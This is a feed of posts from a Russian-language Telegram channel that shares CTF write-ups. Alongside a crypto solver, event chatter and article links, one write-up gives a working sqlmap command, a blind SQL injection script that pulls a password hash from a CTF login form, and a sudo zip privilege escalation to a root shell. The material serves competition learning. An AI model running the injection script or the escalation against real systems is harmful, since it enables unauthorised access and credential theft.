Райтапы по CTF{2025}
2.83K subscribers
215 photos
25 videos
87 files
393 links
☺️ Уютное сообщество для публикации райтапов с разных CTF соревнований и платформ

💬 Наш ламповый чатик: @writeup_chat

✍️ По любому вопросу можно писать мне: @freenameruuuu

Таски решать тут: @writeup_ctf_bot
Download Telegram
#криптография
Искусство войны от @exited3n, автора канала @pt_soft
Сложность: легкий
Ссылка на задание


from Crypto.Util.number import long_to_bytes


def inv(a, m):
m0 = m
x0 = 0
x1 = 1

if m == 1:
return 0

while a > 1:
q = a // m
t = m
m = a % m
a = t
t = x0
x0 = x1 - q * x0
x1 = t

if x1 < 0:
x1 = x1 + m0

return x1


def findMinX(num, rem, k):
prod = 1
for i in range(0, k):
prod = prod * num[i]
result = 0

for i in range(0, k):
pp = prod // num[i]
result = result + rem[i] * inv(pp, num[i]) * pp

return result % prod


rem = [7, 4, 9]
num = [17, 23, 37]
k = len(num)
a = findMinX(num, rem, k)
cipher_text = 25183524468752482838730336135334402772668615375346038
flag = cipher_text ^ a

print("a ==", a)
print(long_to_bytes(flag).decode('UTF-8'))


#codebygames
🔥81🤬1
Forwarded from wr3dmast3r vs pentest
Знакомимся с DOOM DOM Invader, или как найти DOM-XSS на Habr во время написания статьи 😔

Сегодня поговорим про инструмент DOM Invader, узнаем некоторые причины появления DOM-уязвимостей и проанализируем несколько примеров уязвимого JavaScript-кода 🖼️

Также вы узнаете, какой потенциальный импакт можно показывать команде BugBounty для получения выплаты за Client-Side уязвимость 👀

Подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥21
Друзья, я просто хочу напомнить

Присылайте ваши райтапы
Повышайте свою цитируемость

Поверьте, потом это вам зачтется, не стесняйтесь
👍131
Forwarded from KarKarichCTF
#квесты
Секретный кабинет от @karkarich_1, автора канала @KARkarich37
Сложность: легкий
Ссылка на задание

В задании дается хост и два порта: на одном из них веб сервис, а на другом ssh. Смотрим на сервис и видим форму для отправки пароля при этом форма отправляет еще и имя пользователя “josh”. Тогда запустим sqlmap и посмотрим, что он выводит. Sqlmap говорит, что password неуязвим, а вот username да!
sqlmap -u "http://62.173.140.174:28780/login.php" --data "username=josh&password=asd" --method POST 

Получается залогинится под Джоном, но на страничке все равно ничего нет( Тогда попробуем извлечь из БД его пароль, используя LIKE, чтобы залогиниться через ssh. Я это делал вот этим скриптом:
import requests as r
from string import printable
s = r.Session()
r0 = s.get("http://62.173.140.174:28780/login.php")
r1 = s.post("http://62.173.140.174:28780/login.php", data={"username":"josh", "password":"a"}).text
pas = ''
f = 1
while f:
f = 0
for i in printable:
if i in ["%", "_"]: continue
r2 = s.post("http://62.173.140.174:28780/login.php", data={"username":f"josh' AND password LIKE '{pas+i}%' #", "password":"a"}).text
if r2 != r1:
pas+=i
f = 1
break
print(pas)
В итоге получаем хэш пароля и через crackstation.net подбираем сам пароль. Далее подключаемся по ssh и сразу прописываем
sudo -l

Видим, что можем выполнять команду zip от рута. Далее повышаем привилегии и все!
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
🔥6🤯2
Forwarded from infosec
🌐 Wi-Fi CheatSheet.

• Очень объемное руководство, которое поможет вам разобраться в основах работы Wi-Fi:

➡️ https://www.wiisfi.com

#CheatSheet #WiFi
Please open Telegram to view this post
VIEW IN TELEGRAM
Вдруг кто забыл, стартовал HackOSINT
Удачной охоты!

https://platform.hackosint.net/
👍8
На связи с Сашкой
Когда нашел всё:
Слитые пароли
Все никнеймы
Все айди
Админки
Почтовые клиенты
Мертвого слона
Обошёл все проверки на брут

Но не флаг.
Еще немного и я с Котофеем в доле
🔥4
Потихоньку решаем задачки!

Могу сказать, что CTF крайне приятный. Организаторы подошли к таскам творчески, чувствуется атмосфера Just for Fun. Есть маленькие недочётики, но куда без них, согласитесь?

Надеюсь, что разбор тасков обязательно будет, может даже с видео!

Обязательно дам развернутую и правильную обратную связь по окончанию мероприятия. Если у вас есть что сказать, обязательно пишите. Все будут услышаны!
11👍1🔥1😴1💊1
Forwarded from Сашка Котофей
Ахахаха, глупый осинтер!!!! Я неуловоим!!!!!!
я устал, я ухожу
35 из 323
👍61🔥1
Что по бонусы, бандиты?
У нас наш дорогой сокомандник @Max_RSC в соло сюда дошел!

26 из 275

UPD: 23!
9🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
😁1
Это было великолепно
Хочу сказать большое спасибо всем, кто принимал участие. Организаторы были всегда на связи. Было много фана. Я просто в восторге
👍6🔥21
Media is too big
VIEW IN TELEGRAM
Расширенная режиссерская версия
Всех еще раз с окончанием этого прекрасного мероприятия!
Идите спать
9🔥5